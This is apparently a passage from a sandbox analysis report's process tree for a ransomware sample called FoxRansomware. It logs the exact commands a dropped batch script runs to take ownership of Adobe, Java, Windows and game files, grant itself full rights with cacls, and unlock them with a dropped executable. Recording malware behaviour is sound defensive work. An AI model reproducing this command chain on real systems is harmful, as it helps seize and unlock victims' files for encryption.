C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1254.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵
- Loads dropped DLL
PID:2620 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner3⤵
- Loads dropped DLL
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "overlay.png" -nobanner4⤵
- Executes dropped EXE
PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵
- Loads dropped DLL
PID:1708 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
- Loads dropped DLL
PID:3544 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵
- Loads dropped DLL
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵
- Loads dropped DLL
PID:3948 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:2256 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵
- Loads dropped DLL
PID:2060 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:3328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner3⤵
- Loads dropped DLL
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "AUMProduct.cer" -nobanner4⤵
- Executes dropped EXE
PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:312 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:4012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵
- Loads dropped DLL
PID:3140 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:3088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_all.gif" -nobanner3⤵
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "email_all.gif" -nobanner4⤵
- Executes dropped EXE
PID:2304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵
- Loads dropped DLL
PID:1688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "open_original_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "open_original_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:3316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵
- Loads dropped DLL
PID:3768 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "rss.gif" -nobanner3⤵
- Loads dropped DLL
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "rss.gif" -nobanner4⤵
- Executes dropped EXE
PID:3924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:3540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:3804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:3880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:3076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:3252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:3236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:2096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵
- Modifies file permissions
PID:3632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFM" -nobanner3⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "SY______.PFM" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:3136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:2308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:3288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:3392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:2104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can129.hsp" -nobanner3⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "can129.hsp" -nobanner4⤵PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:4220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:4212
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:4292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:4252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:4364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:4480
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:4556
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner3⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "tasks.xml" -nobanner4⤵PID:4580
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:4644
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:4680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:4648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:4672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:4688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:4708
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵PID:4812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:4724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ChessMCE.png" -nobanner3⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ChessMCE.png" -nobanner4⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:4880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:4896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:4932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:4852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:4940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:5024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:5016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "bl.gif" -nobanner3⤵PID:5004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "bl.gif" -nobanner4⤵PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5048
-
-
-
